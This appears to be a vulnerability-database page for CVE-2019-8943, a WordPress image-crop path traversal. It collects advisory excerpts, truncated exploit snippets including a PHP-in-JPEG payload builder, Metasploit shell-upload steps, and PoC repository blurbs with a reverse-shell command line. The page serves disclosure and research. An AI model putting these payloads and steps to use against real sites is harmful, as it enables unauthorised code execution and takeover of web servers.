CVSSv3: 6.5

CVE-2019-8943

Published: 20/02/2019 Updated: 23/02/2021
CVSS v2 Base Score: 4 | Impact Score: 2.9 | Exploitability Score: 8
CVSS v3 Base Score: 6.5 | Impact Score: 3.6 | Exploitability Score: 2.8
VMScore: 453
Vector: AV:N/AC:L/Au:S/C:N/I:P/A:N

Vulnerability Summary

WordPress up to and including 5.0.3 allows Path Traversal in wp_crop_image(). An attacker (who has privileges to crop an image) can write the output image to an arbitrary directory via a filename containing two image extensions and ../ sequences, such as a filename ending with the .jpg?/../../file.jpg substring.


Vulnerable Product

wordpress wordpress

Vendor Advisories

Debian Bug report logs - #923583 wordpress: CVE-2019-8943 Package: src:wordpress; Maintainer for src:wordpress is Craig Small <csmall@debian.org>; Reported by: Salvatore Bonaccorso <carnil@debian.org> Date: Sat, 2 Mar 2019 13:15:04 UTC Severity: important Tags: security, upstream Found in version wordpress/5.0.3+df ...
Arch Linux Security Advisory ASA-201903-10 ========================================== Severity: High Date : 2019-03-18 CVE-ID : CVE-2019-8943 Package : wordpress Type : directory traversal Remote : Yes Link : security.archlinux.org/AVG-909 Summary ======= The package wordpress before version 5.1-1 is vulnerable to directory tr ...
Arch Linux Security Advisory ASA-201902-30 ========================================== Severity: High Date : 2019-02-28 CVE-ID : CVE-2019-8943 Package : wordpress Type : directory traversal Remote : Yes Link : security.archlinux.org/AVG-909 Summary ======= The package wordpress before version 5.1-1 is vulnerable to directory tr ...

Exploits

## # This module requires Metasploit: metasploit.com/download # Current source: github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FileDropper include Msf::Exploit::Remote::HTTP::Wordpress def initialize(info = {}) super(update_info( ...
var wpnonce = ''; var ajaxnonce = ''; var wp_attached_file = ''; var imgurl = ''; var postajaxdata = ''; var post_id = 0; var cmd = '<?php phpinfo();/*'; var cmdlen = cmd.length; var payload = '\xff\xd8\xff\xed\x004Photoshop 3.0\x008BIM\x04\x04'+'\x00'.repeat(5)+'\x17\x1c\x02\x05\x00\x07PAYLOAD\x00\xff\xe0\x00\x10JFIF\x00\x01\x01\x01\x00`\x00`\x0 ...

Metasploit Modules

WordPress Crop-image Shell Upload

This module exploits a path traversal and a local file inclusion vulnerability on WordPress versions 5.0.0 and <= 4.9.8. The crop-image function allows a user, with at least author privileges, to resize an image and perform a path traversal by changing the _wp_attached_file reference during the upload. The second part of the exploit will include this image in the current theme by changing the _wp_page_template attribute when creating a post. This exploit module only works for Unix-based systems currently.

msf > use exploit/multi/http/wp_crop_rce
msf exploit(wp_crop_rce) > show targets
    ...targets...
msf exploit(wp_crop_rce) > set TARGET <target-id>
msf exploit(wp_crop_rce) > show options
    ...show and set options...
msf exploit(wp_crop_rce) > exploit

Github Repositories

Blog Writeup (TryHackMe) - by yag1n3. Room Info. Room Labels: CVE-2019-8943, WordPress, Blog, Web. Room Objectives: root.txt, user.txt. Where was user.txt found? What CMS was Billy using? What version of the above CMS was being used? Reconnaissance: Nmap. A WordPress site and some Samba. Samba: We use enum4linux to retrieve some information. We are able to access the share BillySMB wi

WEB02 WHITEHAT 30. This challenge is based on the vulnerability in WordPress 5.0.0 (CVE-2019-8943). Through this challenge, people will perhaps see the importance of playing CTF. Some say CTF is not realistic and not worth spending time on. CTF is indeed only

WordPress Crop-Image CVE-2019-8943. A python3 script for WordPress Crop-Image CVE-2019-8943 Authenticated Remote Code Execution (RCE). It drops a malicious PHP backdoor. Getting Started. Executing program. RCE: python3 wp_rce.py -t wordpressrce/ -u admin -p password -m twentytwenty. Help. For help menu: python3 wp_rce.py -h

Exploit of CVE-2019-8942 and CVE-2019-8943

CVE-2019-8943 Exploit of CVE-2019-8942 and CVE-2019-8943

WordPress-RCE. WordPress 5.0.0 - Image Remote Code Execution. Exploit of CVE-2019-8942 and CVE-2019-8943 using python. ExploitDB: www.exploit-db.com/exploits/49512. The original exploit for metasploit: WordPress Core 5.0.0 - Crop-image Shell Upload (Metasploit): www.exploit-db.com/exploits/46662

A simple PoC for WordPress RCE (author privilege), refer to CVE-2019-8942 and CVE-2019-8943.

Summary. A simple PoC for WordPress RCE (author privilege), refer to CVE-2019-8942 and CVE-2019-8943. Affected Version: WordPress <= 4.9.8 (verified), WordPress <= 5.0.0. Test Environment. Docker Image: docker pull avfisherdocker/wordpress:4.9.8; docker run -d -p 80:80 avfisherdocker/wordpress:4.9.8. Mysql & WordPress Info: Type Username Password mysql

WordPress 5.0.0 Crop-image Remote Code Execution. Description: The exploit code takes advantage of the CVE-2019-8943 and CVE-2019-8942 vulnerabilities to gain remote code execution on WordPress 5.0.0 and <= 4.9.8. Exploitation: root@kali:~# python3 poc.py --url mysite.com -u uriel -p qwerty -lhost 101062 -lport 443 [*] Authenticating to wordpress [+] Login successful

CVE-2019-8942 and CVE-2019-8943: WordPress RCE (author privilege). Overview: CVE-2019-8942 is a vulnerability that abuses an LFI flaw combined with the File Upload feature to achieve RCE on a WordPress web server with author privileges. Affected WordPress versions include those before 4.9.9 and 5.x before 5.0

Some exploits I have written to showcase and to share

exploits. Some exploits I have written to showcase and to share. All exploits are for vulnerabilities that have been fixed for months prior to release and are not meant to be used for exploitation in any way, but for educational purposes only. Here is the list of the exploits you can find here: CVE | Software | Impact | Write-Up: CVE-2020-27194 | Linux | LPE | scannell.me/fuzz

DerpNStink. Walkthrough of the DerpNStink CTF. 1. VM setup. Download the VM: www.vulnhub.com/entry/derpnstink-1,221/ 2. Port scan. # Nmap 7.91 scan initiated Wed Apr 21 17:14:59 2021 as: nmap -n -P0 -p- -sC -sV -O -T5 -oA full 192.168.56.105 Nmap scan report for 192.168.56.105 Host is up (0.00072s latency). Not shown: 65532 closed ports PORT STA

SecBooks. A collection of articles from major security document libraries and WeChat official accounts; some libraries are deployed with gitbook, and some official accounts consist mainly of scattered articles. Plugins used: "hide-element", "back-to-top-button", "-lunr", "-search", "search-pro", "splitter". # plugin for automatic table-of-contents generation (book sm) npm install -g gitbook-summ

PoC in GitHub 2021. CVE-2021-1056 (2021-01-07): NVIDIA GPU Display Driver for Linux, all versions, contains a vulnerability in the kernel mode layer (nvidia.ko) in which it does not completely honor operating system file system permissions to provide GPU device-level isolation, which may lead to denial of service or information disclosure. pokerfaceSad/CVE-2021-1056 CVE-2021-

PoC in GitHub 2020. CVE-2020-0014: It is possible for a malicious application to construct a TYPE_TOAST window manually and make that window clickable. This could lead to a local escalation of privilege with no additional execution privileges needed. User action is needed for exploitation. Product: Android. Versions: Android-8.0, Android-8.1, Android-9, Android-10. Android ID: A-1286745


PoC auto collect from GitHub.

PoC in GitHub 2020. CVE-2020-0022: In reassemble_and_dispatch of packet_fragmenter.cc, there is a possible out of bounds write due to an incorrect bounds calculation. This could lead to remote code execution over Bluetooth with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-8.0, Android-8.1, Android-9, Andr